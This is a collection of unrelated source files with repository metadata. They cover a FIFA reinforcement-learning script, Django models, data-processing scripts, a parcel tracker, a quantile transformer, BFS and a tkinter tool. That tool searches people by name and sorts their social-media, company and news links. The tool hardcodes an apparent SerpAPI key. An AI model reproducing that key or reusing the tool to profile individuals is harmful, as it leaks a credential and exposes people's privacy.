np.save("epochs.npy",np.array(epochs))
np.save("avg_goals.npy",np.array(avg_goals))
for layer in dqn.model.layers:
print(layer.get_weights())
def test_dqn_free_kicks():
game_env = FifaEnv()
dqn = DQN_RGB(NUM_ACTIONS)
#dqn = DQN(NUM_ACTIONS)
data = []
dqn.load_model("drl-network-fifa-final")
'''for layer in dqn.model.layers:
print(layer.get_weights())'''
num_goals = 0
print('----- TESTING DQN AGENT -----')
time.sleep(3)
for e in range(NUM_EPOCHS_TEST):
history_actions = []
game_over = False
goal = 0
# Verifies if it's an end of the training session (Time is over) or if there's a bug
end_training_session = game_env.check_end_of_episode()
if end_training_session:
game_env.hard_reset()
time.sleep(2)
# get first state
#frames = collections.deque(maxlen=4)
x_t = game_env.observe_state()
#frames.append(x_t)
#s_t = dqn.preprocess_images(np.array(list(frames)))
s_t = dqn.preprocess_image(x_t)
while not game_over:
# Updates the previous state (previous state = current state)
s_tm1 = s_t
#### Get next action ####
# if len(history_actions) > MAX_ACTIONS, there's a movement loop. So shoot the ball
if len(history_actions) < MAX_ACTIONS:
# Random (exploration)
if np.random.rand() <= 0.05:
a_t = np.random.randint(low=0, high=NUM_ACTIONS, size=1)[0]
# Best action (exploitation)
else:
q = dqn.model.predict(s_t)[0]
a_t = np.argmax(q)
history_actions.append(a_t)
else:
a_t = np.random.randint(low=2, high=NUM_ACTIONS, size=1)[0]
# apply action, get reward
x_t, r_t, game_over = game_env.step(a_t)
#frames.append(x_t)
#s_t = dqn.preprocess_images(np.array(list(frames)))
s_t = dqn.preprocess_image(x_t)
# increment goal if it's a goal
if r_t == 1:
goal += 1
time.sleep(2)
num_goals += goal
print("Epoch {:04d}/{:d} | Total Goals: {:d} | Epoch Goal: {:d}"
.format(e + 1, NUM_EPOCHS_TEST, num_goals, goal))
return float(num_goals / NUM_EPOCHS_TEST)
def calculate_avg_goals():
avg_goals = np.load("avg_goals.npy")
epochs = np.load("epochs.npy")
epochs = epochs - NUM_EPOCHS_OBSERVE
print(len(epochs))
plt.plot(epochs[NUM_EPOCHS_OBSERVE:], avg_goals[NUM_EPOCHS_OBSERVE:], color='black')
plt.xlabel('Epochs')
plt.ylabel('Avg Goals')
plt.savefig('training_rmsprop_drl.png')
train_dqn_free_kicks()
test_dqn_free_kicks()
calculate_avg_goals()
|
matheusprandini/FifaFreeKickLearning2019
|
Main.py
|
Main.py
|
py
| 7,635 |
python
|
en
|
code
| 0 |
github-code
|
6
|
5461309461
|
from django.db import models
# Create your models here.
class Category(models.Model):
slug = models.SlugField(max_length=30, primary_key=True)
name = models.CharField(max_length=50)
image = models.ImageField(upload_to='categories', blank=True)
class Meta:
verbose_name = 'Kategorya'
verbose_name_plural = 'Kategorya'
def __str__(self):
return self.name
class Product(models.Model):
title = models.CharField(max_length=100)
description = models.TextField()
price = models.DecimalField(max_digits=10, decimal_places=2)
category= models.ForeignKey(Category, on_delete=models.CASCADE,
related_name='products')
create_at = models.DateTimeField(auto_now_add=True)
image = models.ImageField(upload_to='products', blank=True)
class Meta:
verbose_name = 'Producty'
verbose_name_plural = 'Producty'
def __str__(self):
return f'{self.title} Opisanie: {self.description[0:20]}'
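# Illustrative ORM queries enabled by related_name='products' above (shell or
# view code, not part of models.py; the slug value is made up):
# category = Category.objects.get(slug='kategorya-1')
# cheap = category.products.filter(price__lt=100).order_by('-create_at')
# count = category.products.count()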
|
izumichiDana/djangoModels
|
main/models.py
|
models.py
|
py
| 1,010 |
python
|
en
|
code
| 0 |
github-code
|
6
|
1277452974
|
"""Default settings."""
import logging
settings = {
'log': {
'level': "debug", # log level
},
'auth': {
'required': False, # set to `True` to enable authentication
'basic_auth': {
'path': '/dev/null', # path to htpasswd file
},
},
'server': {
'port': 1779, # port :-P
},
'staticpath': '/dev/null', # path to static files
'packagepath': '/dev/null', # path to qgis plugins
}
logging.basicConfig(
level=getattr(logging, settings['log']['level'].upper()),
)
|
t4k1t/qgisrv
|
qgisrv/settings.py
|
settings.py
|
py
| 552 |
python
|
en
|
code
| 0 |
github-code
|
6
|
24255720694
|
import pandas as pd
import os
import time
from xlrd import XLRDError
start_time = time.time()
# list of paths to ebay files
ebay_files = []
# searching all excel files in the folder
for root, dirs, files in os.walk(r'D:\Projects\shopContent\ebay'):
ebay_files.extend([os.path.join(root, file) for file in files if file.endswith('.xlsx')])
dirs.clear()
# creating dataframe
ebay_df = pd.DataFrame()
# appending tables from all source ebay files to one dataframe skipping first 2 rows
print("Creating ebay dataframe!")
for file in ebay_files:
try:
ebay_df = ebay_df.append(pd.read_excel(file, sheet_name="Listings", skiprows=2))
except XLRDError:
print(f"No sheet named \'Listings\' in file - {file}")
# create dataframe from csv file
print("Creating shopify dataframe!")
shopify_df = pd.read_csv(r'D:\Projects\shopContent\shopify\shopify.csv', sep=',', encoding="utf-8", header=0)
# replace '||' symbols to ', ' in column 'C:Season'
print("Replacing '||' symbols in ebay dataframe!")
ebay_df['C:Season'] = ebay_df['C:Season'].str.replace("\|\|", ', ')
# enable only 'Custom Label (SKU)', 'C:Brand', 'C:Type', 'C:Season' columns in dataframe
print("Excluding columns in ebay dataframe!")
ebay_df = ebay_df[['Custom Label (SKU)', 'C:Brand', 'C:Type', 'C:Season']]
# export ebay_df and shopify_df to excel files
print("Export ebay and shopify dataframes to xlsx!")
ebay_df.to_excel(r'D:\Projects\shopContent\ebay\ebay.xlsx', index=False, header=True, encoding="utf-8")
shopify_df.to_excel(r'D:\Projects\shopContent\shopify\shopify.xlsx', index=False, header=True, encoding="utf-8")
# rename columns name in ebay dataframe
print("Renaming columns in ebay dataframe!")
ebay_df.rename(columns={'Custom Label (SKU)': 'Variant SKU', 'C:Brand': 'Vendor',
'C:Type': 'Type', 'C:Season': 'Tags'}, inplace=True)
# exclude columns 'Vendor', 'Type', 'Tags' in shopify dataframe
print("Excluding columns in shopify dataframe!")
shopify_df = shopify_df[['Handle', 'Title', 'Body (HTML)', 'Published',
'Option1 Name', 'Option1 Value', 'Option2 Name', 'Option2 Value',
'Option3 Name', 'Option3 Value', 'Variant SKU', 'Variant Grams',
'Variant Inventory Tracker', 'Variant Inventory Qty',
'Variant Inventory Policy', 'Variant Fulfillment Service',
'Variant Price', 'Variant Compare At Price',
'Variant Requires Shipping', 'Variant Taxable', 'Variant Barcode',
'Image Src', 'Image Position', 'Image Alt Text', 'Gift Card',
'SEO Title', 'SEO Description',
'Google Shopping / Google Product Category', 'Google Shopping / Gender',
'Google Shopping / Age Group', 'Google Shopping / MPN',
'Google Shopping / AdWords Grouping',
'Google Shopping / AdWords Labels', 'Google Shopping / Condition',
'Google Shopping / Custom Product', 'Google Shopping / Custom Label 0',
'Google Shopping / Custom Label 1', 'Google Shopping / Custom Label 2',
'Google Shopping / Custom Label 3', 'Google Shopping / Custom Label 4',
'Variant Image', 'Variant Weight Unit', 'Variant Tax Code',
'Cost per item']]
# replace unnecessary characters with blank in ebay dataframe
print("Replacing unnecessary symbols in ebay dataframe!")
ebay_df['Variant SKU'] = ebay_df['Variant SKU'].str.replace("-", '')
ebay_df['Variant SKU'] = ebay_df['Variant SKU'].str.replace("A", '')
ebay_df['Variant SKU'] = ebay_df['Variant SKU'].str.replace("B", '')
ebay_df['Variant SKU'] = ebay_df['Variant SKU'].str[:6]
# replace unnecessary characters with blank in shopify dataframe
print("Replacing unnecessary symbols in shopify dataframe!")
shopify_df['Variant SKU'] = shopify_df['Variant SKU'].str.replace("-", '')
shopify_df['Variant SKU'] = shopify_df['Variant SKU'].str.replace("\'", '')
shopify_df['Variant SKU'] = shopify_df['Variant SKU'].str.replace("A", '')
shopify_df['Variant SKU'] = shopify_df['Variant SKU'].str.replace("B", '')
shopify_df['Variant SKU'] = shopify_df['Variant SKU'].str[:6]
# drop duplicate rows in the ebay dataframe
print("Deleting duplicates in ebay dataframe!")
ebay_df = ebay_df.drop_duplicates(subset=['Variant SKU'], keep='first')
# left join shopify_df to ebay_df using column 'Variant SKU'
print('Joining shopify_df and ebay_df')
join_ebay_shopify_df = pd.merge(shopify_df, ebay_df, on='Variant SKU', how='left')
# set blank value in cell where 'Variant SKU' is null
print("Setting blank value in cell where 'Variant SKU' is null")
for index, row in join_ebay_shopify_df.iterrows():
if row.isnull()['Variant SKU']:
join_ebay_shopify_df.at[index, 'Vendor'] = ''
join_ebay_shopify_df.at[index, 'Type'] = ''
join_ebay_shopify_df.at[index, 'Tags'] = ''
# export join dataframe to excel file
print("Export final dataframe to xlsx!")
join_ebay_shopify_df.to_excel(r'D:\Projects\shopContent\final.xlsx', index=False, header=True, encoding="utf-8")
# time spent for execution
end_time = time.time()
print(f"\nTime spent: {end_time-start_time}")
|
bfesiuk/shopContent
|
creating.py
|
creating.py
|
py
| 4,995 |
python
|
en
|
code
| 0 |
github-code
|
6
|
70380481467
|
import os
import re
import sys
import json
import tempfile
import urllib.parse
import urllib.request
import http.cookiejar
import dotenv
def _read_json(url, params=None):
url = f'{url}?{urllib.parse.urlencode(params)}'
request = urllib.request.Request(url)
response = urllib.request.urlopen(request)
data = json.loads(response.read().decode('utf-8'))
return data
def main():
dotenv.load_dotenv()
args = sys.argv[1:]
CODIGO_RASTREAMENTO = os.getenv('CODIGO_RASTREAMENTO')
if len(args) > 1:
print(f'[!] Erro: Esperei 1 argumento, mas recebi {len(args)}')
exit(1)
codigo_rastreamento = None
if len(args) == 1:
codigo_rastreamento = args[0]
elif CODIGO_RASTREAMENTO is not None:
codigo_rastreamento = CODIGO_RASTREAMENTO
else:
print(f'[!] Erro: Nenhum código de rastreamento encontrado')
exit()
codigo_rastreamento = codigo_rastreamento.strip()
if not re.match(r'[A-Z]{2}[0-9]{9}BR', codigo_rastreamento):
print(f'[!] Erro: Código de rastreamento inválido ({codigo_rastreamento})')
exit(1)
# Set up an HTTP session with cookie handling
cookie_jar = http.cookiejar.CookieJar()
cookie_processor = urllib.request.HTTPCookieProcessor(cookie_jar)
opener = urllib.request.build_opener(cookie_processor)
urllib.request.install_opener(opener)
# Fetch the captcha image that has to be solved
request = urllib.request.Request('https://rastreamento.correios.com.br/core/securimage/securimage_show.php')
response = urllib.request.urlopen(request)
with tempfile.NamedTemporaryFile(suffix='.png', delete=False) as f:
f.write(response.read())
try:
os.startfile(f.name)
valor_captcha = input('[?] Digite o captcha exibido: ').strip()
finally:
os.remove(f.name)
# Use the captcha value in the request for the first result
data = _read_json(
'https://rastreamento.correios.com.br/app/resultado.php',
{'objeto': codigo_rastreamento, 'captcha': valor_captcha, 'mqs': 'S'},
)
if data.get('erro', 'false') == 'true':
print('[!] Erro: O captcha inserido está incorreto')
exit(1)
output_dir = os.path.join('outputs', codigo_rastreamento)
try:
os.makedirs(output_dir)
except FileExistsError:
pass
with open(os.path.join(output_dir, 'resultado.json'), 'w+', encoding='utf-8') as f:
json.dump(data, f, indent=2, ensure_ascii=False)
# Use the most recent "finalizador" value in the request for the second result
dados_eventos = data.get('eventos')
if dados_eventos:
tipo_postal = dados_eventos[0].get('finalizador')
if tipo_postal:
data = _read_json(
'https://rastreamento.correios.com.br/app/dataMaxima.php',
{'objeto': codigo_rastreamento, 'tipoPostal': tipo_postal},
)
with open(os.path.join(output_dir, 'dataMaxima.json'), 'w+', encoding='utf-8') as f:
json.dump(data, f, indent=2, ensure_ascii=False)
print('[#] Código obtido com sucesso')
main()
|
enzo-santos/publicapi-correios
|
main.py
|
main.py
|
py
| 3,135 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
16645086609
|
# !/usr/bin/python
# -*- coding: utf-8 -*-
"""
__author__ = 'qing.li'
"""
# Run system commands
import os
import subprocess
# print(os.system("adb devices"))
#
# # Collect the output
# print(os.popen("adb devices").readlines())
class Command:
def excute_command_result(self, cmd):
result_list = []
result = os.popen(cmd).readlines()
for i in result:
if i == '\n': continue
result_list.append(i.strip('\n'))
return result_list
def excute_command(self, cmd):
# os.system(cmd)
subprocess.Popen(cmd, shell=True, stdout=open('appium.log', 'a'), stderr=subprocess.STDOUT)
if __name__ == '__main__':
c = Command()
print(c.excute_command_result("adb devices"))
|
QingqinLi/ui_project
|
util/command.py
|
command.py
|
py
| 739 |
python
|
en
|
code
| 0 |
github-code
|
6
|
34529796403
|
import tensorflow as tf
import numpy as np
from collections import namedtuple
from .interpolate_tf import InterpolatorTF, nonzero
InterpolatorsTuple = namedtuple(
"InterpolatorsTuple",
[
"quantiles_to_references_forward",
"quantiles_to_references_backward",
"references_to_quantiles",
"low_quantile",
"high_quantile"
])
class QuantileTransformerTF():
"""sklearn.preprocessing.QuantileTransformer that can be applied in Tensorflow
From the sklearn documentation:
Transform features using quantiles information.
This method transforms the features to follow a uniform or a
normal distribution. Therefore, for a given feature, this
transformation tends to spread out the most frequent values. It
also reduces the impact of (marginal) outliers: this is therefore
a robust preprocessing scheme. The transformation is applied on
each feature independently. The cumulative density function of a
feature is used to project the original values. Features values of
new/unseen data that fall below or above the fitted range will be
mapped to the bounds of the output distribution. Note that this
transform is non-linear. It may distort linear correlations
between variables measured at the same scale but renders variables
measured at different scales more directly comparable.
"""
scope = "QuantileTransformerTF"
def in_tf_scope(function):
def res(self, *args, **kwargs):
with tf.name_scope(self.scope):
return function(self, *args, **kwargs)
return res
@in_tf_scope
def __init__(self, sklearn_transformer, sklearn_indices=None, dtype=None):
"""
Args:
sklearn_transformer: instance of fitted sklearn.preprocessing.QuantileTransformer
sklearn_indices: list of feature indices to use. E. g. if you trained
a transformer for features+outputs, here you can get separate ones. If
None, takes all the features
dtype: np.float32/np.float64, the dtype the transformer expects and outputs.
If None defaults to the sklearn_transformer.quantiles_.dtype
"""
if sklearn_transformer.output_distribution != 'normal':
raise ValueError("Only normal distribution is supported")
if dtype is None:
dtype = sklearn_transformer.quantiles_.dtype.type
self.output_distribution = tf.distributions.Normal(
dtype(0), dtype(1), name="output_distribution")
if sklearn_indices is not None:
selected_quantiles = sklearn_transformer.quantiles_[:, sklearn_indices]
else:
selected_quantiles = sklearn_transformer.quantiles_
self._quantiles = tf.constant(selected_quantiles.astype(dtype),
name="quantiles")
self._references = tf.constant(sklearn_transformer.references_.astype(dtype),
name="references")
self.n_colunms = selected_quantiles.shape[1]
self.interpolators_by_index = []
for index in range(self.n_colunms):
interpolator_quantiles_to_references_forward = InterpolatorTF().fit(
self._quantiles[:, index], self._references)
interpolator_quantiles_to_references_backward = InterpolatorTF().fit(
-self._quantiles[::-1, index], -self._references[::-1])
interpolator_references_to_quantiles = InterpolatorTF().fit(
self._references, self._quantiles[:, index])
self.interpolators_by_index.append(InterpolatorsTuple(
interpolator_quantiles_to_references_forward,
interpolator_quantiles_to_references_backward,
interpolator_references_to_quantiles,
self._quantiles[0, index],
self._quantiles[-1, index]))
self.BOUNDS_THRESHOLD = dtype(1e-7)
self.dtype = dtype
@in_tf_scope
def transform(self, data, inverse):
"""
Builds a graph for transformation
Args:
data - tf.Tensor[n_examples, n_features]
inverse - bool, whether inverse or forward transform is desired
Returns:
tf.Tensor[n_examples, n_features] - transformed data
"""
if inverse:
data = self.output_distribution.cdf(data)
per_feature_transformed = []
for i in range(self.n_colunms):
this_transformed = self._transform_col(data[:, i],
self.interpolators_by_index[i],
inverse)
this_transformed.set_shape([data.shape[0]])
per_feature_transformed.append(this_transformed)
return tf.stack(per_feature_transformed, axis=1)
def inverse_transform(self, data):
"""
Builds a graph for inverse transformation
Args:
data - tf.Tensor[n_examples, n_features]
Returns:
tf.Tensor[n_examples, n_features] - transformed data
"""
return self.transform(data, inverse=True)
@in_tf_scope
def _transform_col(self, data, interpolators, inverse):
if not inverse:
lower_bound_x = interpolators.low_quantile
upper_bound_x = interpolators.high_quantile
lower_bound_y = self.dtype(0)
upper_bound_y = self.dtype(1)
else:
lower_bound_x = self.dtype(0)
upper_bound_x = self.dtype(1)
lower_bound_y = interpolators.low_quantile
upper_bound_y = interpolators.high_quantile
lower_bounds_mask = (data - self.BOUNDS_THRESHOLD < lower_bound_x)
upper_bounds_mask = (data + self.BOUNDS_THRESHOLD > upper_bound_x)
in_range_mask = tf.logical_not(tf.logical_or(lower_bounds_mask, upper_bounds_mask))
data_in_range = tf.boolean_mask(data, in_range_mask)
if not inverse:
interpolated = 0.5*(
interpolators.quantiles_to_references_forward.interp(data_in_range) -
interpolators.quantiles_to_references_backward.interp(-data_in_range))
else:
interpolated = interpolators.references_to_quantiles.interp(data_in_range)
res = tf.dynamic_stitch(
[nonzero(upper_bounds_mask),
nonzero(in_range_mask),
nonzero(lower_bounds_mask)],
[tf.fill(tf.count_nonzero(upper_bounds_mask, keepdims=True), upper_bound_y),
interpolated,
tf.fill(tf.count_nonzero(lower_bounds_mask, keepdims=True), lower_bound_y)])
if not inverse:
res = self.output_distribution.quantile(res)
clip_min = self.output_distribution.quantile(tf.constant(
self.BOUNDS_THRESHOLD - np.spacing(1), dtype=self.dtype))
clip_max = self.output_distribution.quantile(tf.constant(
1 - (self.BOUNDS_THRESHOLD - np.spacing(1)), dtype=self.dtype))
res = tf.clip_by_value(res, clip_min, clip_max)
return res
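# --- Usage sketch (illustrative; assumes a TF1-style graph/session, matching
# the tf.distributions / tf.placeholder era API used above; X_train and
# X_batch are placeholders for the user's data) -------------------------------
# from sklearn.preprocessing import QuantileTransformer
# qt = QuantileTransformer(output_distribution='normal').fit(X_train)
# qt_tf = QuantileTransformerTF(qt)
# x = tf.placeholder(tf.float64, shape=[None, X_train.shape[1]])
# y = qt_tf.transform(x, inverse=False)
# x_back = qt_tf.inverse_transform(y)
# with tf.Session() as sess:
#     y_val, x_val = sess.run([y, x_back], feed_dict={x: X_batch})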
|
yandexdataschool/QuantileTransformerTF
|
quantile_transformer_tf/quantile_transform_tf.py
|
quantile_transform_tf.py
|
py
| 7,127 |
python
|
en
|
code
| 7 |
github-code
|
6
|
1064969872
|
import pygame
from pygame.locals import *
# define constants
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
RED = (255, 0, 0)
GREEN = (0, 255, 0)
BLUE = (0, 0, 255)
CYAN = (0, 255, 255)
VIOLET = (148, 0, 211)
width,height = 600,600
# set up display
pygame.init()
#in case you use fonts:
pygame.font.init()
myfont = pygame.font.SysFont('Consolas', 24)
scorefont = pygame.font.SysFont('Consolas', 72)
screen = pygame.display.set_mode([width,height])
pygame.display.set_caption('Pygame Window') #add your own caption!
FPS = 60 # frames per second
clock = pygame.time.Clock()
counter = 0 #frame count
# loop until user clicks the close button
done = False
while not done:
for event in pygame.event.get():
if event.type == QUIT: # if pygame window is closed by user
done = True
if event.type == KEYDOWN:
if event.key == K_SPACE:
if FPS == 60:
FPS = 300 #faster display
else:
FPS = 60
# fill the screen with background color
screen.fill(CYAN)
counter += 1
pygame.display.update()
# for saving screenshots:
# if counter %5 == 0:
# Capture(screen, 'Capture{}.png'.format(counter), (0, 0), (600, 600))
clock.tick(FPS)
pygame.quit()
|
hackingmath/pygame_sketches
|
pygame_template.py
|
pygame_template.py
|
py
| 1,334 |
python
|
en
|
code
| 4 |
github-code
|
6
|
3407354621
|
from queue import Queue
from adjacencyset import *
def distance_table(graph, start_node):
queue = Queue()
distance_table_map = {}
for v in range(graph.numVertices):
distance_table_map[v] = (None,None)
distance_table_map[start_node] = (0, None)
queue.put(start_node)
while not queue.empty():
vertex = queue.get()
vertex_distance = distance_table_map[vertex][0]
for v in graph.get_adjacent_vertices(vertex):
if distance_table_map[v][0] is None:
distance_table_map[v] = (vertex_distance + 1, vertex)
queue.put(v)
return distance_table_map
# Backtracking.. uses stack(simulated using list and always prepend)
def get_shortest_path(distance_table, source, destination):
path = [destination]
prev_vertex = distance_table[destination][1]
while prev_vertex is not None and prev_vertex != source:  # compare by value; identity checks on ints are unreliable
path = [prev_vertex] + path
prev_vertex = distance_table[prev_vertex][1]
if prev_vertex is None:
print("There is no path from %d to %d " % (source, destination))
else:
path = [source] + path
print(path)
a = AdjacencyGraphSet(5,True)
a.add_edge(0,1)
a.add_edge(0,2)
a.add_edge(1,3)
a.add_edge(2,4)
a.add_edge(4,1)
a.add_edge(1,3)
n = distance_table(a, 2)
print(n)
get_shortest_path(n, 2, 3)
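# Note on the data structure: queue.Queue is thread-safe and carries locking
# overhead; for single-threaded BFS a collections.deque is the usual choice.
# A minimal sketch of the same traversal using deque:
from collections import deque

def distance_table_deque(graph, start_node):
    table = {v: (None, None) for v in range(graph.numVertices)}
    table[start_node] = (0, None)
    pending = deque([start_node])
    while pending:
        vertex = pending.popleft()
        for v in graph.get_adjacent_vertices(vertex):
            if table[v][0] is None:
                table[v] = (table[vertex][0] + 1, vertex)
                pending.append(v)
    return table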
|
VimleshS/python-graph-ds
|
shortest_path_unweighted.py
|
shortest_path_unweighted.py
|
py
| 1,361 |
python
|
en
|
code
| 0 |
github-code
|
6
|
3357759046
|
# item should really be extracted from data
item = ['西红柿','排骨','鸡蛋','茄子','袜子','酸奶','土豆','鞋子']
import pandas as pd
import numpy as np
# header=None keeps the first row as data instead of column names; default integer column labels are used
data = pd.read_excel('tr.xlsx',header = None)
# drop the first column, i.e. the itemset labels I1, I2, I3, ...
data = data.iloc[:,1:]
# why create D? (it becomes a 0/1 matrix: one column per item, one row per transaction)
D = dict()
for i in range (len(item)):
for t in range (len(item)):
z = np.zeros(len(data))
li = list()
for k in range(len(data.iloc[0,:])):
s=data.iloc[:,k]==item[t]
li.extend(list(s[s.values == True].index))
z[li]=1
D.setdefault(item[t],z)
Data = pd.DataFrame(D)
c= list(Data.columns)
c0=0.5
s0=0.2
list1 = []
list2 = []
list3 = []
for k in range(len(c)):
for q in range(len(c)):
# mine the rule between item c[k] and item c[q]: antecedent c[k], consequent c[q], and the two must differ
if c[k] != c[q]:
c1 = Data[c[k]]
c2 = Data[c[q]]
I1 = c1.values == 1
I2 = c2.values == 1
t12 = np.zeros((len(c1)))
t1 = np.zeros((len(c1)))
t12[I1 & I2] = 1
t1[I1] = 1
sp = sum(t12) / len(c1) # support
co = sum(t12) / sum(t1) # confidence
# keep rules with confidence >= c0 and support >= s0
if co >= c0 and sp >= s0:
list1.append(c[k] + '--' + c[q])
list2.append(sp)
list3.append(co)
R = {'rule':list1,'support':list2,'confidence':list3}
R = pd.DataFrame(R)
R.to_excel('rule2.xlsx')
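# For reference, the measures computed above for a rule A -> B are
#   support(A -> B)    = count(A and B) / N         (sum(t12) / len(c1))
#   confidence(A -> B) = count(A and B) / count(A)  (sum(t12) / sum(t1))
# e.g. with 200 baskets, if 40 contain both items and 50 contain the
# antecedent, then support = 40/200 = 0.2 and confidence = 40/50 = 0.8.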
|
0303yk/python-
|
金融数据分析课程知识/购物搭配关联规则挖掘.py
|
购物搭配关联规则挖掘.py
|
py
| 1,625 |
python
|
en
|
code
| 0 |
github-code
|
6
|
62345004
|
from django.urls import path, include
from core import views
urlpatterns = [
path('', views.index, name='index'),
path('register/',views.register, name='register'),
path('home/',views.home, name='home'),
path('history/', views.history, name='history'),
path('generate-new-label/', views.generate_new_label, name='generate-new-label'),
path('edit-label/<int:id>/', views.edit_label, name='edit-label'),
path('delete-label/<int:id>/', views.delete_label, name='delete-label'),
path('print-label/<int:id>/', views.print_label, name='print-label'),
path('logout/', views.logout, name='logout'),
]
|
lquresh52/shipping-label-generaor
|
core/urls.py
|
urls.py
|
py
| 636 |
python
|
en
|
code
| 0 |
github-code
|
6
|
42743009421
|
from setuptools import find_packages
from setuptools import setup
package_name = 'camera_calibration'
setup(
name=package_name,
version='1.12.23',
packages=find_packages(exclude=['test']),
data_files=[
('share/ament_index/resource_index/packages',
['resource/' + package_name]),
('share/' + package_name, ['package.xml']),
],
install_requires=['setuptools'],
author='James Bowman',
author_email='[email protected]',
zip_safe=True,
keywords=['ROS', 'camera_calibration'],
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python',
'Topic :: Software Development',
],
description=(
'camera_calibration for ROS2'
),
license='Apache License, Version 2.0',
tests_require=['pytest'],
entry_points={
'console_scripts': [
'cameracalibrator = camera_calibration.nodes.cameracalibrator:main',
'cameracheck = camera_calibration.nodes.cameracheck:main',
],
},
)
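# --- editor's note (hedged): with the console_scripts entry points above, a typical
# workflow after `colcon build` would be roughly
#   ros2 run camera_calibration cameracalibrator
#   ros2 run camera_calibration cameracheck
# (the exact node arguments depend on the node implementations and are not shown here).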
|
ahuizxc/ros2_camera_calibration
|
setup.py
|
setup.py
|
py
| 1,118 |
python
|
en
|
code
| 2 |
github-code
|
6
|
11623004632
|
import tkinter as tk
from tkinter import filedialog, messagebox
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import pandas as pd
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.common.by import By
from selenium.common.exceptions import TimeoutException
from selenium.common.exceptions import NoSuchElementException
from tkinter import ttk
import requests
from bs4 import BeautifulSoup
import time
from requests.exceptions import SSLError, ConnectTimeout
class App:
def __init__(self, root):
self.root = root
self.root.geometry("300x220")
        # Frame for the menu
        self.menu_frame = tk.Frame(root, width=150, bg="grey", height=50, relief='sunken')
        self.menu_frame.grid(row=0, column=0, sticky='ns')
        # Menu buttons
        self.simple_search_button = tk.Button(self.menu_frame, text="Recherche Simple", command=self.show_simple_search)
        self.simple_search_button.pack(fill='both')
        self.identity_search_button = tk.Button(self.menu_frame, text="Recherche Identité", command=self.show_identity_search)
        self.identity_search_button.pack(fill='both')
        # Frame for the content area
        self.content_frame = tk.Frame(root)
        self.content_frame.grid(row=0, column=1, sticky='nsew')
        # Sub-interfaces for each search type
        self.simple_search_interface = self.create_simple_search_interface()
        self.identity_search_interface = self.create_identity_search_interface()
        last_row_index = 6  # Replace this value with the index of the desired last row.
        self.progress = ttk.Progressbar(self.simple_search_interface, orient='horizontal', length=100, mode='determinate')
        self.progress.grid(row=last_row_index, column=0)  # Use last_row_index to position the progress bar.
        # Automatic resizing of columns and rows
root.grid_columnconfigure(1, weight=1)
root.grid_rowconfigure(0, weight=1)
self.df = None
self.filename = None
self.current_row = 0
self.driver = webdriver.Chrome(service=Service(r'C:\Users\maxime.cedelle\Desktop\AISearch-2\chromedriver'))
def create_simple_search_interface(self):
frame = tk.Frame(self.content_frame)
self.upload_button = tk.Button(frame, text="Upload Excel", command=self.upload_file)
self.upload_button.grid(row=0, column=0)
self.start_button = tk.Button(frame, text="Commencer la recherche", command=self.start_search, state=tk.DISABLED)
self.start_button.grid(row=1, column=0)
self.update_button = tk.Button(frame, text="Mise à jour Excel", command=self.update_excel)
self.update_button.grid(row=2, column=0)
return frame
def create_identity_search_interface(self):
frame = tk.Frame(self.content_frame)
        # Button to upload an Excel file
        self.upload_button_identity = tk.Button(frame, text="Upload Excel", command=self.upload_file)
        self.upload_button_identity.pack()
        # Text field for the last name
        self.name_label = tk.Label(frame, text="Nom")
        self.name_label.pack()
        self.name_entry = tk.Entry(frame)
        self.name_entry.pack()
        # Text field for the first name
        self.surname_label = tk.Label(frame, text="Prénom")
        self.surname_label.pack()
        self.surname_entry = tk.Entry(frame)
        self.surname_entry.pack()
        # Checkbox that shows or hides the birth-year text field
        self.show_birth_year_check = tk.Checkbutton(frame, text="Inclure l'année de naissance", command=self.toggle_birth_year)
        self.show_birth_year_check.pack()
        # Text field for the birth year (hidden by default)
        self.birth_year_label = tk.Label(frame, text="Année de naissance")
        self.birth_year_entry = tk.Entry(frame)
        self.birth_year_entry.pack()
        self.birth_year_label.pack()
        self.birth_year_label.pack_forget()
        self.birth_year_entry.pack_forget()
        # Button to start the search
self.start_identity_search_button = tk.Button(frame, text="Commencer la recherche", command=self.start_identity_search)
self.start_identity_search_button.pack()
return frame
def start_identity_search(self):
name = self.name_entry.get()
surname = self.surname_entry.get()
if name and surname:
            # Run a SerpAPI search for the entered data
            results = self.search_person(name, surname)
            # Show the results in a pop-up window
            self.show_results(results)
        elif self.df is not None:
            for _, row in self.df.iterrows():
                name = row['nom']
                surname = row['prenom']
                # Run a SerpAPI search for each person
                results = self.search_person(name, surname)
                # Show the results in a pop-up window
                self.show_results(results)
            # Show a pop-up telling the user that all searches are finished
messagebox.showinfo("Information", "Toutes les recherches sont terminées.")
else:
messagebox.showinfo("Information", "Veuillez d'abord uploader un fichier Excel ou entrer des données dans les champs de texte.")
def search_person(self, name, surname):
social_info = {"Nombre": 0, "Liens": [], "Noms": []}
digital_life = {"Nombre": 0, "Liens": [], "Noms": []}
        digital_life_news = {"Nombre": 0, "Liens": [], "Noms": []}  # new category for digital-life news results
company_info = {"Nombre": 0, "Liens": [], "Noms": []}
company_sites = ['societe.com', 'infogreffe.fr', 'b-reputation.com', 'verif.com']
params = {
"engine": "google",
"q": f"{name} {surname}",
"api_key": "9b0d4c0366546a7bd81c14d13ae3f304ea744bff2faa67fab9eed518194b7f40",
"hl": "fr",
"gl": "fr",
"google_domain": "google.com",
"location": "France"
}
        for i in range(2):  # limit to 2 result pages
params["start"] = i*10
try:
response = requests.get('https://serpapi.com/search', params)
data = response.json()
except Exception as e:
print(f"Erreur lors de la récupération des résultats de recherche : {e}")
continue
for result in data.get('organic_results', []):
url = result['link']
title = result.get('title', '').lower()
if name.lower() in title and surname.lower() in title:
if 'linkedin.com' in url or 'facebook.com' in url or 'twitter.com' in url or 'instagram.com' in url or 'pinterest.com' in url or 'tiktok.com' in url:
social_info["Nombre"] += 1
social_info["Liens"].append(url)
social_info["Noms"].append(name + " " + surname)
elif any(company_site in url for company_site in company_sites):
company_info["Nombre"] += 1
company_info["Liens"].append(url)
company_info["Noms"].append(name + " " + surname)
else:
digital_life["Nombre"] += 1
digital_life["Liens"].append(url)
digital_life["Noms"].append(name + " " + surname)
params["tbm"] = "nws"
params["start"] = 0
try:
response = requests.get('https://serpapi.com/search', params)
data = response.json()
except Exception as e:
print(f"Erreur lors de la récupération des résultats de recherche d'actualités : {e}")
return
